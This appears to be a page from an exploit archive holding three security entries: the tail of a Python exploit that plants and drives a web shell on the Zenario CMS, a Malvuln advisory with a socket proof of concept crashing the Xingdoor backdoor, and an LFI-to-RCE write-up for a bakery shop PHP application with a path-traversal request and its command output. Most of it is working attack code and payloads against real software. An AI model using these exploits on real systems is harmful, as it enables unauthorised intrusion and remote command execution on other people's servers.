'"},"checksum":{"_was_hidden_before":true,"current_value":"y8vuS"},"date_uploaded":{"current_value":"2021-09-2920173A213A31"},"privacy":{"_display_value":"Public","current_value":"public"},"tags":{"_display_value":false,"current_value":""},"link_to_add_tags":{}}},"upload_image":{"edit_mode":{"on":true},"fields":{"thumbnail_grouping":{},"title":{"current_value":""},"thumbnail_image":{},"delete_thumbnail_image":{},"zenario_common_feature__upload":{"current_value":""}}},"extract":{"edit_mode":{"on":0},"fields":{"extract":{"current_value":"No20plain-text20extract"},"extract_wordcount":{"current_value":0}}}},"_sync":{"cache_dir":"' + cache_dir_sync + '","password":"' + password_sync + '","iv":"' + iv_sync + '","session":false},"tab":"details"}'})<br /><br />## Get public URL webshell<br />resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX",<br /> headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},<br /> data={"id": file_id, "generate_public_link": 1})<br /><br />response_body = resp.text<br />web_shell_url = response_body[response_body.find("http"): response_body.find(file_name) + 36]<br /><br /># If web shell OK<br />print("Web shell is available!")<br />print("URL:", web_shell_url)<br />print("Enter command.")<br /><br /><br />## Execute command<br />cmd = ''<br />while cmd != "exit":<br /> ### Get command<br /> cmd = input("> ")<br /><br /> ### Get result<br /> resp = requests.post(web_shell_url, data={"cmd": cmd})<br /> response_body = resp.text<br /> result = response_body[response_body.find("8d589afa4dfaeeed85fff5aa78e5ff6a") + 32: response_body.find("7f021a1415b86f2d013b2618fb31ae53")]<br /><br /> print(result)<br /> pass<br /><br />## Delete web shell<br />resp = requests.post(TARGET + "/zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX",<br /> headers={"Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"},<br /> data={"id": file_id, "delete": 1})<br />print("Web shell is deleted!")<br /><br /># Delete docx file<br />os.remove(file_name + ".docx")<br />print("Docx file is deleted!")<br /> <br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/89000e259ffbd107b7cc9bac66dcdcf5.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Xingdoor<br />Vulnerability: Denial of Service<br />Description: The malware "System_XingCheng" listens on TCP port 7016. Attackers who can send a specially crafted packet, can trigger an int 3 "\xcc" breakpoint debug error causing a disruption in service. The error is a MS Visual C++ Debug Error, occurs when the value of ESP is not properly saved across a function call.<br />Family: Xingdoor<br />Type: PE32<br />MD5: 89000e259ffbd107b7cc9bac66dcdcf5<br />Vuln ID: MVID-2022-0542<br />Disclosure: 04/06/2022<br /><br />Memory Dump:<br />This dump file has a breakpoint exception stored in it.<br />The stored exception information can be accessed via .ecxr.<br />eax=00000000 ebx=00000000 ecx=b30fec4c edx=00000001 esi=00000003 edi=00000003<br />eip=76feed3c esp=0019f53c ebp=0019f6cc iopl=0 nv up ei pl nz na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />76feed3c c21400 ret 14h<br /><br />0:000> .ecxr<br />eax=00000001 ebx=00384000 ecx=b30fec4c edx=00000001 esi=004027f0 edi=0019fef0<br />eip=004027de esp=0019fe64 ebp=0019fe78 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246<br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Xingdoor.89000e259ffbd107b7cc9bac66dcdcf5.exe<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Xingdoor.89000e259ffbd107b7cc9bac66dcdcf5.exe<br />Backdoor_Win32_Xingdoor_89000e259ffbd107b7cc9bac66dcdcf5+0x27de:<br />004027de cc int 3<br /><br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br /><br />FAULTING_IP: <br />Backdoor_Win32_Xingdoor_89000e259ffbd107b7cc9bac66dcdcf5+27de<br />004027de cc int 3<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 004027de (Backdoor_Win32_Xingdoor_89000e259ffbd107b7cc9bac66dcdcf5+0x000027de)<br /> ExceptionCode: 80000003 (Break instruction exception)<br /> ExceptionFlags: 00000000<br />NumberParameters: 1<br /> Parameter[0]: 00000000<br /><br />DEFAULT_BUCKET_ID: STATUS_BREAKPOINT<br /><br />PROCESS_NAME: Backdoor.Win32.Xingdoor.89000e259ffbd107b7cc9bac66dcdcf5.exe<br /><br />ERROR_CODE: (NTSTATUS) 0x80000003 - {EXCEPTION} Breakpoint A breakpoint has been reached.<br /><br />EXCEPTION_CODE: (HRESULT) 0x80000003 (2147483651) - One or more arguments are invalid<br /><br />EXCEPTION_PARAMETER1: 00000000<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 00001928<br /><br />PRIMARY_PROBLEM_CLASS: STATUS_BREAKPOINT<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STATUS_BREAKPOINT<br /><br />LAST_CONTROL_TRANSFER: from 00401596 to 004027de<br /><br />STACK_TEXT: <br />WARNING: Stack unwind information not available. Following frames may be wrong.<br />0019fe78 00401596 0019fe25 0040112f 004027f0 Backdoor_Win32_Xingdoor_89000e259ffbd107b7cc9bac66dcdcf5+0x27de<br />0019fe80 0040112f 004027f0 004027f0 00384000 Backdoor_Win32_Xingdoor_89000e259ffbd107b7cc9bac66dcdcf5+0x1596<br />0019fef0 00402903 00400000 00000000 02783767 Backdoor_Win32_Xingdoor_89000e259ffbd107b7cc9bac66dcdcf5+0x112f<br />0019ff80 76698654 00384000 76698630 fa8d215c Backdoor_Win32_Xingdoor_89000e259ffbd107b7cc9bac66dcdcf5+0x2903<br />0019ff94 76fe4a77 00384000 b30fa868 00000000 kernel32!BaseThreadInitThunk+0x24<br />0019ffdc 76fe4a47 ffffffff 77009ea7 00000000 ntdll!__RtlUserThreadStart+0x2f<br />0019ffec 00000000 004027f0 00384000 00000000 ntdll!_RtlUserThreadStart+0x1b<br /><br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Xingdoor_89000e259ffbd107b7cc9bac66dcdcf5+27de<br />004027de cc int 3<br /><br />SYMBOL_STACK_INDEX: 0<br /><br />SYMBOL_NAME: Backdoor_Win32_Xingdoor_89000e259ffbd107b7cc9bac66dcdcf5+27de<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Xingdoor_89000e259ffbd107b7cc9bac66dcdcf5<br /><br />IMAGE_NAME: Backdoor.Win32.Xingdoor.89000e259ffbd107b7cc9bac66dcdcf5.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 3f169e33<br /><br />STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb<br /><br />FAILURE_BUCKET_ID: STATUS_BREAKPOINT_80000003_Backdoor.Win32.Xingdoor.89000e259ffbd107b7cc9bac66dcdcf5.exe!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_STATUS_BREAKPOINT_Backdoor_Win32_Xingdoor_89000e259ffbd107b7cc9bac66dcdcf5+27de<br /><br />Exploit/PoC:<br />from socket import *<br />import time<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=7016<br /><br />def chk_res(s):<br /> res=""<br /> while True:<br /> res += s.recv(512)<br /> break<br /> if "\0" in res or "\n" in res or res == "":<br /> break<br /> return res<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> print(chk_res(s))<br /> time.sleep(1)<br /> s.send("a")<br /> print(chk_res(s))<br /> s.send("\r\n"+"A"*88+"\r\n")<br /> time.sleep(1)<br /> print(chk_res(s))<br /> time.sleep(1)<br /> s.send("A"*88+"\n")<br /> print(chk_res(s))<br /> <br /> s.close()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Title: Bakery Shop Management System 1.0 LFI To RCE<br /># Author: Hejap Zairy<br /># Date: 06.04.2022<br /># Vendor: https://www.campcodes.com/projects/php/simple-bakery-shop-management-system/<br /># Software: https://www.campcodes.com/wp-content/uploads/2022/02/bsms_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br /><br />#vulnerability Code php<br />Needs more filtering require_once<br /><br />```<br />require_once('DBConnection.php');<br />$page = isset($_GET['page']) ? $_GET['page'] : 'home';<br />if($_SESSION['type'] != 1 && in_array($page,array('maintenance','products','stocks'))){<br /> header("Location:./");<br /> exit;<br />}<br />```<br /><br />[+] Payload GET<br /><br /><br />```<br />GET //bsms/?page=../../../0day&515=dir HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=ttdhr0ntd2dte05a2quob2kr3s<br />Upgrade-Insecure-Requests: 1<br />```<br /><br /><br />#Status: CRITICAL<br /><br />#Response <br />```<br /> <div class="container py-3" id="page-container"><br /><br /> Volume in drive C is OS<br /> Volume Serial Number is 2EF1-9DCA<br /><br /> Directory of C:\xampp\htdocs\bsms<br /><br />04/06/2022 04:18 AM <DIR> .<br />04/06/2022 05:05 AM <DIR> ..<br />02/14/2022 10:39 AM 16,358 Actions.php<br />08/04/2021 11:04 PM <DIR> css<br />02/14/2022 11:55 AM <DIR> database<br />09/09/2021 11:54 AM <DIR> DataTables<br />02/14/2022 11:55 AM 865 DBConnection.php<br />08/05/2021 03:09 AM <DIR> Font-Awesome-master<br />02/14/2022 12:00 PM 10,407 home.php<br />02/14/2022 11:07 AM <DIR> images<br />02/14/2022 02:26 PM 10,018 index.php<br />09/11/2021 11:40 AM <DIR> js<br />02/14/2022 11:11 AM 4,372 login.php<br /><br />```<br /><br /><br /><br /># Description:<br />Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/qLNHh9Q.png<br />https://i.imgur.com/XDSsyNL.jpg<br /></code></pre>